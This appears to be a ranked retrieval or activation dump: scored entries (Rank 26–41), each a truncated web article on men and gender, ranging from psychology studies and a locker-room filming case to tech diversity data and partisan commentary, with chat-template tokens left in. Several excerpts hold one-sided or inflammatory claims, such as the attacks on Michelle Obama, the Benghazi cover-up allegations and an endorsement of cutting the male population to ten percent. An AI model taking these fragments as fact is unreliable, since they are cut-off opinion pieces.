Shigehiro Oishi of the University of Virginia reported in a recent issue of the Journal of Personality and Social Psychology. In one experiment conducted with 32 male/female dating couples, the participants were given a test they were told measured their intelligence. The test was not graded, but each participant was informed that his or her partner scored in either the top 12% or bottom 12%. The men who had been told they had high-scoring partners measured lower on a self-esteem test than the men who thought their female partners scored low. + +Other studies have also shown that men often regard their female partners’ success as a reflection on them; if she succeeds more, it means he has failed. Women, on the other hand, are more likely to see the man’s success as good for the relationship overall.[/pullquote]In another experiment with 122 men and women who were involved in heterosexual relationships but weren’t couples, the males scored higher on a measure of self-esteem when recalling a time when their partner had failed at an intellectual or social endeavor. The result was quite different for women. “Unlike men, even when women were explicitly asked to think of [a] time when their partner succeeded and they themselves failed, their implicit self-esteem was not decreased,” stated the researchers. + +Other studies have also shown that men often regard their female partners’ success as a reflection on them; if she succeeds more, it means he has failed. Women, on the other hand, are more likely to see the man’s success as good for the relationship overall. They also tend to view their own success in terms of its value for the relationship, rather than just being about “me.” These differences in perspective are not surprising, considering traditional gender roles. “Because men and women have different social roles, different expectations for their close relationships, and different responses to competition, it is likely that men and women’s self-esteem is differentially impacted by a romantic partner’s success or failure,” Drs. Ratliff and Oishi wrote in their published report. + +One explanation for men’s reaction is that they fear their mate might seek out a more appealing man, according to Mark White, Ph.D., chair of the philosophy department at the College of Staten Island/CUNY. “[The man’s +================================================================================ +Rank = 26; Score = 344064.0 +<|begin_of_text|>When men contribute less to their household's income, relative to their wives, they tend to become more polarized in their political views. (iStock) + +There's something about money and men. + +Researchers have long shown a link between men's identities and their income: Men tend to work more hours if faced with the threat of their wife earning as much as they do. When men make less money than their wives, they tend to do less housework, not more. And when men are out-earned in their marriages, they're even more likely to use erectile dysfunction medicine or show greater rates of depression. + +Now, a new study, currently under review by an academic journal but published last week by the Harvard Business Review, finds that when a man's contribution to his household's total income drops over time, it affects his political views, too. Republican men tend to grow more conservative, and guys who say they're Democrats become more liberal. + +[America’s manliest industries are all competing for women] + +To do the research, Dan Cassino wanted to look at the effect lower incomes have on men's political views, but knew that comparing men's relative income, marriages and politics is hard because of something known as “selection bias.” For example, it could simply be that different kinds of men marry women who earn more than them — in other words, there's no random application of people to spouses. + +So he looked at the General Social Survey, a panel study that asks the same individuals about demographic data and views on issues over time, pulling data on 854 men from 2006, 2008 and 2010. About 60 percent of those men saw their income drop relative to their spouses during one of those two-year periods, giving Cassino a look at how men's views evolved during a period when, thanks to the recession and financial crisis, men were disproportionately likely to lose their jobs or take pay cuts, compared with women, who have increasingly become the family breadwinners. + +“That's a huge opportunity to look at what happened to those men's individual attitudes,” he said. For men, in particular, income is tied to their gender identity and status. “The reason you're anxious about … less money is not just, 'oh, I have less money.' It's that my masculinity is being called into question by the fact that [I] make less money,” Cassino said. + +[Why the gender gap doomed Hillary Clinton] + +He pulled data on how the men's views changed on two issues: How much they +================================================================================ +Rank = 27; Score = 342016.0 +<|begin_of_text|>Joseph Dalesandro, 19, was ordered held on $50,000 bail Friday. View Full Caption DNAinfo; Chicago Police Department + +COOK COUNTY CRIMINAL COURTHOUSE — A UIC freshman with a four-year swimming scholarship has been charged with illegally filming female teammates as they changed clothes in their locker room. + +Joseph Dalesandro, 19, was ordered held on $50,000 bail Friday on allegations he filmed four women with an iPhone over the course of several hours Feb. 2. + +According to prosecutors, locker rooms for men and women on the UIC swimming and diving teams are separated by a partition wall that has a gap between the top of the wall and the ceiling for a smoke detector. + +Dalesandro is accused of perching his iPhone on the wall about 11 a.m. Feb. 2 and recording two women on the diving team, ages 19 and 20, as they changed clothes. + +Dalesandro filmed the women for three minutes, prosecutors said, but later cropped the video to feature one minute of nudity. + +About two hours later, Dalesandro filmed the women's locker room for 45 minutes — this time capturing two swimmers, ages 19 and 20, as they changed clothes, Assistant State's Attorney Joseph Carlson said during a bond hearing Friday. + +One of the women heard laughter coming from the men's locker room and looked up, expecting the men to throw something over the wall, prosecutors said. + +Instead, she spotted Dalesandro's phone, Carlson said. Two of the women retrieved the phone and brought it to their coach, who called campus police. + +During the course of their investigation, officers learned the phone was registered to Dalesandro and his mother, prosecutors said. Dalesandro was one of five men who had access to the locker room at the time of filming; his phone was also logged into the UIC wireless network with his username when the videos were made. + +Police on Thursday arrested Dalesandro, who lives on campus and comes from Naperville. He confessed to making the videos and "stated he knew what he had done was illegal," Carlson said. + +In court Friday, Assistant Public Defender Marc Davidson noted that the videos Dalesandro recorded were never disseminated, and that Dalesandro has no prior criminal history. + +"This was a prank," Davidson said. "A tasteless prank that went nowhere.... This will cost him dearly over the years." + +Davidson went on to say that Dalesandro is a UIC freshman with a four +================================================================================ +Rank = 28; Score = 339968.0 +<|begin_of_text|>Throw back your head and let out a long celebratory birthday howl for Nikai! Welcome to the terrific twos, kiddo! The Wolf Conservation Center‘s youngest Ambassador has been an inspiration from his adorable start. Within a month of joining the WCC family the little beast huffed, puffed, and hiccuped his way into the hearts and minds of a global audience. His viral video “Wolf Pup Hiccups” almost broke the internet! + +Today the stunning ambassador continues to awe and help open the door to understanding wolves by forging a connection between the public and his wild kin. Although he remains a “ladies man,” having yet to completely outgrow his uneasiness around men, his trepidation is natural and his behavior offers WCC guests a glimpse of how elusive wolves naturally are. + +Physically Nikai is no longer the baby of the family; he has become equal in stature to older siblings Alawa and Zephyr. He does, however, remain the “child” within the family hierarchy. Zephyr is the self-appointed leader of the family – expressing his status with erect posture and tail carried high. Most of the time Nikai exhibits his lower position through submissive/puppy-like behavior. With lowered tail and posture, he acknowledges his role and rank in the family order. He is often pawing, tucking his tail, and licking the muzzles of his siblings – some of the natural submissive gestures expressed by less dominant wolves. However, during the winter months Nikai did test Zephyr. He incessantly egged on his older brother until the two had it out while Alawa wisely steered clear of the mayhem. Thankfully it took only a few bumps and scratches to return peace and order to the pack with Zephyr at the helm once again. + +So a new chapter opens for our Ambassador trio. And what an honor to watch the family transition into such powerful players in the fight to preserve wolves’ rightful place in the environment. + +Help support the Wolf Conservation Center‘s efforts to protect and preserve wolf populations in North America by adopting the birthday boy! We offer several adoption levels. No matter what the level, each adoption kit includes an 8×10 wolf photo, wolf biography, adoption certificate and a subscription to our newsletter. Learn more. + +Happy Birthday, Nikai!<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 29; Score = 339968.0 +<|begin_of_text|>For more than three decades evolutionary psychologists have advanced a simple theory of human sexuality: because men invest less reproductive effort in sperm than women do in eggs, men's and women's brains have been shaped differently by evolution. As a result, men are eager for sex whereas women are relatively choosy. But a steady stream of recent evidence suggests this paradigm could be in need of a makeover. + +"The science is now getting to a point where there is good data to question some of the assumptions of evolutionary psychology," says social psychologist Wendy Wood of the University of Southern California (U.S.C.). + +The eager males–choosy females paradigm doesn't imply that men and women literally make conscious decisions about how much effort they should put into short- and long-term mating relative to their costs of reproduction—minutes versus months. Instead the idea is that during human history, men and women who happened to have the right biochemical makeup to be easy and choosy, respectively, would leave more offspring than their counterparts. + +In 1993 psychologists David Buss and David Schmitt, then at the University of Michigan at Ann Arbor, used that idea to generate a series of predictions about men's and women's sexual behavior. As part of their study, Buss and Schmitt surveyed college students about their desire for short- and long-term mates (that is, one-night stands versus marriage partners), their ideal number of mates, how long they would have to know someone before being willing to have sex, and what standards a one-night stand would have to meet. In all categories the men opted for more sex than the women. + +Although the study has been cited some 1,200 times, according to Google Scholar, there were "huge gaps from what I'm used to as a scientist," says Lynn Carol Miller of U.S.C. Miller says that in order to evaluate the relative proportion of mating effort devoted to short- and long-term mating in the two sexes, the proper method is to use a scale such as time or money, which has the same interval between units, not the seven-point rating scale that Buss and Schmitt used. + +In a study to be published in the journal Sex Roles: A Journal of Research, Miller and her colleagues carried out their own version of Buss and Schmitt's work, asking how much time and money college students spent in a typical week pursuing short-, intermediate- or long-term relationships. The proportion of mating effort dedicated to short-term mating was the same for men and women. Similarly, both men and women showed an equivalent tendency to lower +================================================================================ +Rank = 30; Score = 337920.0 +<|begin_of_text|>Inside the April issue of Vanity Fair, Jonah Hill, Seth Rogen, Jason Segel and Paul Rudd spoof a 2006 cover with Tom Ford, Keira Knightley and Scarlett Johansson. But with bodysuits. What a cop-out. + +Is it funny that the guys (and Annie Leibovitz, who shot both images) spoofed the shot? Sure. But it would have been funnier if the guys were actually naked. Who made this decision? Why bodysuits? It's understandable to try and create a "pale" skin tone for the purposes of recreating the original photograph properly, but Leibovitz is a whiz with lighting. Is the world not ready for Jonah Hill's ass? As for Jason Segel, he already did full-frontal nudity in Forgetting Sarah Marshall. We saw Seth Rogen's bare buttocks in Knocked Up. Why is it that naked woman can appear on the cover of Vanity Fair, yet none of these dudes can expose their bellies? Is it because they're not thin? + +Of course, this issue just reflects the problems with nudity in our society in general. When I went to see Friday The 13th, the theater was crowded with men and women, but after the third time a female actress was shown topless, some girl behind me yelled out, "How come we can't see no huevos?" She was asking for balls, but knew that the movie wouldn't show any, because the producers didn't have any. And that's the problem with this "spoof." As any good comedian knows, you have to commit to the joke. This one was done — ahem — half-assed.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 31; Score = 331776.0 +<|begin_of_text|>Late Wednesday, Twitter released a report showing what's become a very familiar story in Silicon Valley: That its workforce is mostly white and mostly male. By the company's own admission, Twitter has "a lot of work to do." Seven out of 10 employees there are men. + +Meanwhile, nearly two-thirds of Twitter is staffed by whites. Asians are also dominant, accounting for 29 percent of employees. + +This matches a lot of what we've seen at other companies lately, from Google to Yahoo to Facebook to LinkedIn. The reports all speak clearly and transparently about the need to become more inclusive — not just when it comes to gender, but also to race. At Google, for instance, only 2 percent of employees are black and 3 percent Hispanic. + +There is a another story in the data that's less apparent, though, and it's about class. We don't typically talk about class as it relates to tech companies, because tech tends to be a lucrative field in its own right and engineers make a lot of money. If anything, tech employees have borne the brunt of the criticism in connection with San Francisco's skyrocketing housing prices, or the exclusive corporate shuttle buses that wind their way through the city during rush hour. + +Still, the data show that there's a big gap between the executives at the top of the pyramid and those who actually make the machines go. + +This is true for Twitter, but also at Yahoo, where women account for 37 percent of the workforce but only 23 percent of leadership positions. Whites make up only 50 percent of Yahoo's U.S. employees, but as much as 78 percent of its U.S.-based leadership. + +Asians make up more than a third of Facebook's overall workforce. Yet only 19 percent have made it into senior-level positions. + +There appears to be a ceiling at many of these companies that transcends demography — though it's important to point out that some groups in leadership do match their level of representation in the rest of the company. Blacks account for 2 percent of Twitter's employees, and they also account for 2 percent of Twitter's leadership. Hispanics account for 4 percent of leadership employees at Facebook, and also 4 percent of the company's overall workforce. + +Why should we care whether the top level leadership looks like the rest of the company? For the same reasons that people care about a company's diversity overall: Different experiences and value systems help counter groupthink. Homogeneity at the top conditions people to act in certain ways that might +================================================================================ +Rank = 32; Score = 331776.0 +<|begin_of_text|>While Led Zeppelin's "Stairway to Heaven" is a well-known template for rock music, very few have managed to follow it well. Three whole decades passed from its 1971 release and no one bested it, not even Guns N' Roses' "November Rain" or Journey's "Don't Stop Believing" or, uh, Live's "Lightning Crashes." It was only in the 2000s that rock bands got their shit together and produced several candidates that lived up to "Stairway." But like the Highlander, there can be only one. Friends, today we're going to discover which of these 00s alt-rock slammers is the millennial successor to this classic rock not-slammer (the live versions are the true gospel). + +Now, it's not like we're in an anthem-deficient time in music. The new lighter-wavers are just rap and trap and pop singles, which is great! But the nature of, say, "Black Beatles" is wholly different from a "Stairway" or its imitators, the likes of which we may never see again. These largely straight and white men made these songs because they wanted you to feel their very important feelings, dammit, and they were going to use all the tools in the arsenal of rock to do so. There's a pure, innocent beauty in that kind of obliviousness, and it's that magic we're trying to remember and tediously rank today. Seeing as how sports and competition are the basis of everything now, we're going to do this as a bracket tournament. + +So you may ask yourself, "what makes a song a 'Stairway'"? That's a great question, so let's define what a "Stairway" is. + +A "Stairway to Heaven" is... + +1. Almost always a rock song, typically a ballad + +2. Recognizable within the first few seconds + +3. Already emotional from the jump, but eventually reaches a point that has all living things weeping openly + +While there are definitely many giant, cathartic rock songs from the last decade, very few of them are actually known by regular people, and that ubiquity is what's really needed (i.e. "All My Friends" and other indie classics are not eligible). And yes, this will pool from songs released mainly in the last decade, as this gives the minimum amount of time for nostalgia to ferment into uncritical adoration. Cool? Cool. Let's +================================================================================ +Rank = 33; Score = 325632.0 +<|begin_of_text|>Michelle Obama: Spokesperson for the Lying Left + +Race-baiter Michelle Obama returns to tell America just how racist the Republican Party. She says the Republicans made people “not trust” politics. + +At the Pennsylvania Conference for Women, Michelle Obama said when she attended the State of the Union address she got uncomfortable as she noticed on the Republican side of the room there was “all white men.” + +According to Breitbart: + +“At the State of the Union address … when you are in the room what you can see is this real dichotomy. It’s a feeling of color almost. On one side of the room is literally gray and white. Literally, that is the color palette on one side of the room. On the other side of the room, there are yellows and blues and whites and greens. Physically, there’s a difference in color, in the tone, because on one side all men, all white, on the other side some woman, some people of color.” take our poll - story continues below Will the media learn anything from their biased reporting of the Jussie Smollett story? Will the media learn anything from their biased reporting of the Jussie Smollett story? + +Will the media learn anything from their biased reporting of the Jussie Smollett story? * Yes, they've gotten so much wrong recently that they're bound to be on their best behavior. No, they suffer from a bad case of Trump Derangement Syndrome. Jussie who? + +Email * + +Email This field is for validation purposes and should be left unchanged. Completing this poll grants you access to The Black Sphere updates free of charge. You may opt out at anytime. You also agree to this site's Privacy Policy and Terms of Use. Trending: SCOTUS Justice Send Warning to FAKE NEWS Journalists She continued, “I look at that, and I go, no wonder. No wonder we struggle, no wonder people don’t trust politics. We’re not even noticing what these rooms look like.” + +Hard to believe how “sensitive” Michelle Obama can be. + +Exactly what have white men done to Michelle Obama? She lived in a black-centric world. And if any men took advantage of her, you can bet they weren’t white. Yet, she appears to have a psychosis for white men. + +One would think her fear of white men would have dwindled, given the number of white men it took to get her husband elected? What of those “white men”? + +And what of Michelle Obama obsession with +================================================================================ +Rank = 34; Score = 325632.0 +<|begin_of_text|>All eyes were on Shayne Oliver as he stepped into a sweltering Bronx church in the heat of summer, 2000. The lanky teenager shuffled into the vestibule wearing a short white crop top, exposing his taut midriff. Blots of black skin poked through hand-tattered jeans that were so tight he had to cut them up and safety-pin them back together to get them on. Shayne's outfit set him drastically apart from the men of the congregation, who wore boxy suits. He and his mother hadn't even taken seats in a pew before the preacher started spewing a diatribe of venomous, homophobic remarks from the pulpit. It took a moment before Shayne realized the preacher was attacking him. "Basically, the pastor ran me out of the church," he told me recently. "I stopped going after that." + +Shayne's now 25 and the designer of menswear label Hood By Air, whose provocative styles—along with brands like Telfar and Third Floor—are carving out a new and empowering palette of masculinity for young black men to paint from. At Shayne's shows, it's not out of the ordinary to see his models stalk the runway in makeup and dresses. Their bellies are often exposed, and half the time you can't tell whether they're men or women. But far from sissiness, the looks exude the visceral power of a lineman crushing a quarterback, or two swords clashing in an action film. This time last year, at Shayne's debut New York Fashion Week runway show, the scene was so thick I had to stand on my tiptoes to catch a glimpse of his powerful vision of androgynous modern menswear. With macho gangster rapper A$AP Rocky on the catwalk, and stars like Kanye West and Waka Flocka Flame in the crowd offering up their adulation, the show was the birth of a new epoch in the evolution of black masculinity. + +There have been others who've pushed similar boundaries in the past. Before Kanye and A$AP, black artists like Sly and the Family Stone in the 60s and Cameo in the 80s wore gear that looked like it was straight out of the Folsom Street Fair. In the 90s, Tupac walked in a Versace fashion show in a flamboyant gold suit. + +But one of the things that sets this new wave apart from what came before is that straight men like Kanye and Rocky have no problem recognizing +================================================================================ +Rank = 35; Score = 323584.0 +<|begin_of_text|>There’s already been time for the launch, reception of, and backlash against the new women’s website Bustle.com and its founder, Bryan Goldberg. + +Somewhere in some distant and undoubtedly frightening corner of the internet, there may already be a backlash against the backlash. + +The basic premise is a simple, stupid, and unfortunately familiar one: a man decided to do something for women and finally do it RIGHT, dad gum it, ignoring that there were already women doing this thing, and despite his own total cluelessness about the topic at hand. The man in this case is Bryan Goldberg, founder of the also not-great media outlet Bleacher Report. + +Goldberg decided it was time for a “women’s publication that puts world news and politics alongside beauty tips.” He managed to raise $6.5 million in venture capital to do this. (Bustle’s editorial team is entirely female [UPDATE: There are at least two men writing regularly for Bustle], and Goldberg has indicated an alleged lack of interest in editorial decisions with the statement, “Knowing the difference between mascara, concealer, and eye-liner is not my job,” but the company is very clearly headed by a man.) Maybe the reason Goldberg didn’t realize he was years behind the curve on this idea is that he thinks Vogue and Glamour are the frontrunners of online women’s media, theorizing that since Vogue had “fewer than 1 million unique visitors in June,” there was an obvious void for Bustle to step into. (Jezebel had 2.1 million unique visitors per month three years ago, and now has 5.1 million monthly visitors.) (And Glamour does include politics with its beauty tips.) Ironically, one of the publications Goldberg identified as being “aimed at men,” Business Insider, has even posted a piece covering women’s frustration with this move. All in all, it’s quickly become abundantly clear that Goldberg decided to execute a bad idea without deciding to learn anything about it first. And still got financing for it. + +In this unbelievably misguided launch piece, Goldberg dares to assert the following: + +“Women’s publishers have completely lost sight of which decade their readers are living in. This is a country where women out-graduate men. They are also closing the “income gap” quickly, and in many cities, they out-earn their male counterparts. But magazines like UsWeekly talk to women as though they were children, and they fail to connect popular culture with any form of social commentary.” + +The statement +================================================================================ +Rank = 36; Score = 321536.0 +<|begin_of_text|>Skip to comments. + +Humanity Should be 10% Male 90% Female (BC Prof Mary Daly) + +Posted on by beckett + +What Is Enlightenment (Susan Bridle): Which brings us to another question I wanted to ask you. Sally Miller Gearhart, in her article "The Future If There Is One Is Female" writes: "At least three further requirements supplement the strategies of environmentalists if we were to create and preserve a less violent world. 1) Every culture must begin to affirm the female future. 2) Species responsibility must be returned to women in every culture. 3) The proportion of men must be reduced to and maintained at approximately ten percent of the human race." What do you think about this statement? + +Mary Daly: I think it's not a bad idea at all. If life is to survive on this planet, there must be a decontamination of the Earth. I think this will be accompanied by an evolutionary process that will result in a drastic reduction of the population of males. People are afraid to say that kind of stuff anymore. + +WIE: Yes. I find myself now thinking that's a bit shocking. + +MD: Well, it's shocking that it would be shocking. + +WIE: So it doesn't sound like your vision of a separate nation for women is something you see as an interim stage that would eventually lead to men and women living together in true equality. + +MD: No. That's a very old question. I answered that to audiences twenty-five, thirty years ago. I just don't think that way. See, right now, I would be totally joyous to have a great community of women whether men are somewhere out on the periphery or not. I don't have this goal of: "Oh, then we can all get together again!" That doesn't seem to be a very promising future. So why would I think about it? I think it's pretty evident that men are not central to my thought. + +WIE: I have one last question. At the beginning of this interview, you spoke about the experience of being deeply at one with that which animates all of life. I wanted to ask you what you think about the possibility of becoming identified with that as who one ultimately is, having that as one's ultimate resting place, or ground, so to speak, and where one's gender would no longer be a primary reference point. + +MD: I don't know if that has anything to do with my experience. I have my own experience of oneness. +================================================================================ +Rank = 37; Score = 321536.0 +<|begin_of_text|>In college, I was in a sort of “future broadcasters” club with a bunch of other students who were looking to do television hosting, news anchoring, radio announcing, podcasting, etc. The majority of us were women, so we often talked about gender-specific issues. When Gretchen Carlson sued Roger Ailes for sexual harassment earlier this month, I wasn’t shocked; my classmates and I had learned from an Emmy-winning producer just how common behavior like Carlson described was in newsrooms across the country. + +While at this point, we simply don’t know if the allegations are true, we also learned that if we ever experienced harassment of any sort, we should go to our boss immediately. In fact, in the nine places I’ve worked, I was told to do that every time. At Barnes & Noble, my managers asked a man who was saying lewd things to me to leave the premises. At the spa where I worked reception in college, the owner believed me the moment I told her we were getting creepy phone calls. She helped me create a list of the phone numbers making the calls. When one of them called the next time, she picked up and let them have it. That gave me the impression I was valued. My safety was prioritized above a sale. + +Since the second wave of feminism in the 1960s and ’70s, women have been infiltrating and dominating the workforce through nearly every field, but it’s no secret that walking into a well-established boys’ club can be a dangerous gamble. That doesn’t mean it shouldn’t be done. One of the important roles of a manager in the workplace is to provide support to employees who need it. Women who believe they were harassed on the job are employees who need it. Bosses should be the first line of defense against an alleged hostile work environment. + +That’s why what Neil Cavuto did this week is so unconscionable. He defended Ailes against Carlson’s allegations and as someone who has a show on Fox News Channel, he joined ranks with a host of other employees of the network. Unlike Harris Faulkner or Greta Van Susteren or Geraldo Rivera, though, he isn’t just a host. According to the Fox website, he is also senior vice president and managing editor of not only Fox News Channel, but Fox Business, too. + +That means Cavuto is someone’s boss. He is a lot of people’s boss. Many of them are undoubtedly women. By choosing to put more effort into his role as +================================================================================ +Rank = 38; Score = 319488.0 +<|begin_of_text|>Thad McCotter knows the moral of our debt story. + +I’ve been wondering for a while now why the heck Rep. Thad McCotter is running for president. + +Yes, president of the United States. + +You may not have encountered the Michigan Republican as presidential candidate because he did not meet the 1 percent poll threshold for the Fox News debate in Iowa. But a few days later, at the Ames Straw Poll, there he was. + +Advertisement + +Advertisement + +At the Iowa State University stadium, what began as a professorial lecture gave way to a sharp wake-up call as McCotter brought up China: “We have to accept the reality that Communist China is a strategic threat and a rival model of governance to the United States.” The applause made clear that the audience had been called to attention. + +#ad#McCotter continued: “And the reason, as the party of Reagan and Lincoln, we understand, as a free people — we understand our liberty, which comes from our creator, is the foundation of our security and the foundation of our prosperity. The Communist Chinese regime in Beijing that butchered my generation in the streets of Tiananmen Square for quoting Jefferson and Madison believes that human liberty is a threat to state-provided security and prosperity. They are as wrong today as the Soviet Union was wrong in the 20th century, and I for one will not cede the 21st century to a Communist nuclear-armed dictatorship that tells you how many children you can have, that tells you if you can pass out Bibles, that tells you what Catholic Church you can attend, or tries to culturally commit genocide against the people of Tibet.” + +Advertisement + +China, of course, is home to the one-child policy, which turns 31 this September. The policy has manifested itself in a kind of brutality that we can’t watch on CNN but that is nonetheless both real and devastating. China will boast that it has prevented 400 million births since 1980; the program has been implemented through a culture of forced abortion, involuntary sterilization, infanticide, and other persecution. The World Health Organization tells us that China also has the highest female suicide rate in the world. “Could this high suicide rate be related to forced abortion?” asks Reggie Littlejohn, president of Women’s Rights without Frontiers. Many families make sure that their one child is a boy. China has reported as many as 37 million more men than women, making unhappy bachelorhood increasingly commonplace.“China’s One Child Policy causes more violence towards women and +================================================================================ +Rank = 39; Score = 317440.0 +<|begin_of_text|>This post has been corrected. + +All-male speaker lineups are so commonplace that there’s at least one Tumblr blog dedicated to mocking them (with a David Hasselhoff meme, no less). The endless stream of them can leave a thinking person overwhelmed and perhaps even convinced that they’re inevitable. + +If you find yourself in this camp, help is on the way. Enter mathematician Greg Martin, who has presented an ingenious statistical probability analysis that even amateurs like me can(well, mostly) understand. Working with a “conservative” assumption that 24% of PhDs in mathematics have been granted to women over the last 25 years, he finds that it’s overwhelmingly improbable that a speakers’ lineup including one woman and 19 men could be random. + +His explanation of the formula is a rollicking one involving marbles and a potentially suspicious roommate, and you which you can read here. The underrepresentation of women on speakers’ lists doesn’t “just happen,” despite many conference organizers’ claim that it does. + +If you do the math, as Martin has, the argument that speakers are chosen without bias simply doesn’t hold up. In fact, when using the formula to analyze the speakers’ list for a mathematics conference—which featured just one woman and 19 men—he found that it would be eighteen times as likely for women to be overrepresented on the speakers’ list than to be so underrepresented. + +The formula can just as easily be applied to other fields; all that’s needed is reliable data on the field’s gender distribution, which can usually be gathered by way of industry associations and/or government statistics (pdf). + +I spoke with Martin about his analysis, its implications and whether it might finally convince conference organizers to stop making excuses for their underrepresentation of women. + +What prompted you to calculate the statistical probability of all-male speakers’ lists? + +While I’d love to claim it was my idea originally, that’s not the case—I came across a Conference Diversity Distribution Calculator by Aanand Prasad on the web. Prasad further credits inspiration for the idea to comments by Dave Wilkinson and Paul Battley. + +As a side note, following Prasad’s links to those comments leads to two web pages—this one and this one—concerning tech conferences within the last three years that were criticized for inviting men almost exclusively; reading the rest of those comment threads reveals how truly dismissive and defensive people get when gender disparity is pointed out. Sadly, we still have a long way to go. + +If I understand your conclusion correctly, the odds +================================================================================ +Rank = 40; Score = 315392.0 +<|begin_of_text|>The combat code of the US Military is that we don’t abandon our dead or wounded on the battlefield. In US Air Force lingo, fighter pilots don’t run off and leave their wingmen. If one of our own is shot down, still alive and not yet in enemy captivity, we will either come to get him or die trying. Among America’s fighting forces, the calm, sure knowledge that such an irrevocable bond exists is priceless. Along with individual faith and personal grit, it is a sacred trust that has often sustained hope in the face of terribly long odds. + +The disgraceful abandonment of our Ambassador and those brave ex-SEALs who fought to their deaths to save others in that compound is nothing short of dereliction-of-duty. Additionally, the patently absurd cover-up scenario that was fabricated in the aftermath was an outright lie in attempt to shield the President and the Secretary of State from responsibility. + +It has been over eight months since the attack on our compound in Benghazi. The White House strategy, with the aid of a “lap dog press” has been to run out the clock before the truth is forthcoming. The recent testimonies of the three “whistle blowers” have reopened the subject and hopefully will lead to exposure and disgrace of those responsible for this embarrassing debacle. + +It would appear that the most recent firewall which the Administration is counting on is the contention that there were simply no military assets that could be brought to bear in time to make a difference… mainly due to the unavailability of tanker support for fighter aircraft. This is simply BS, regardless how many supposed “experts” the Administration trot out to make such an assertion. The bottom line is that even if the closest asset capable of response was half-way around the world, you don’t just sit on your penguin *** and do nothing. The fact is that the closest asset was not half-way around the world, but as near as Aviano Air Base, Italy where two squadrons of F-16Cs are based. + +Consider the following scenario (all times Benghazi local): + +When Hicks in Tripoli receives a call at 9:40 PM from Ambassador Stevens informing him “Greg, we are under attack!” (his last words), he immediately notifies all agencies and prepares for the immediate initiation of an existing “Emergency Response Plan.” At AFRICON, General Carter Ham attempts to mount a rescue effort, but is told to “stand down.” By 10:30 PM an unarmed drone is overhead the compound and streaming live feed to various Command +================================================================================ +Rank = 41; Score = 313344.0 +<|begin_of_text|>Months after he was supposed to give away more than $100,000 for college scholarships, Milo Yiannopoulos says all of the money is still sitting in his bank account. + +The Breitbart editor and professional political agitator (recently banned from Twitter for harassment) came under fire this week as allegations surfaced that his charity, which would provide college scholarships exclusively to white men, has so far done no charity work with the money. + +Yiannopoulos told The Daily Beast on Thursday that his lawyers are drafting paperwork that would establish it as a legal charity, but experts say that the way in which the “Yiannopoulos Privilege Grant” accepted donations was unethical and possibly illegal. + +Yiannopoulos promised in January to create a college scholarship fund for “white men who wish to pursue their post-secondary education” that would be awarded in “early summer 2016.” The fund has raised somewhere between $100,000 and $250,000 to date, Yiannopoulos told The Daily Beast via email. + +But the Yiannopoulos Privilege Grant has not filed any paperwork to become a charity in the United States. When asked if an application for tax-exempt status had been sent by his lawyers to the Internal Revenue Service, Yiannopoulos said, “I’ll check.” + +No scholarships have been awarded and the charity’s website shows there isn’t even a way for prospective students to apply for them. + +The grant program was announced with the self-congratulatory fanfare typical of many Breitbart articles written about its chief firebrand. + +“In a move certain to infuriate the left, Breitbart Tech Editor Milo Yiannopoulos has created the Yiannopoulos Privilege Grant, a scholarship exclusively available to white men who wish to pursue their post-secondary education on equal footing with their female, queer and ethnic minority classmates,” staff writer William Bigelow wrote in Breitbart, providing a wide audience for the grant’s publicity, on Jan. 21 this year. + +The promise at the time was that the fund would disburse 50 grants of $2,500 to 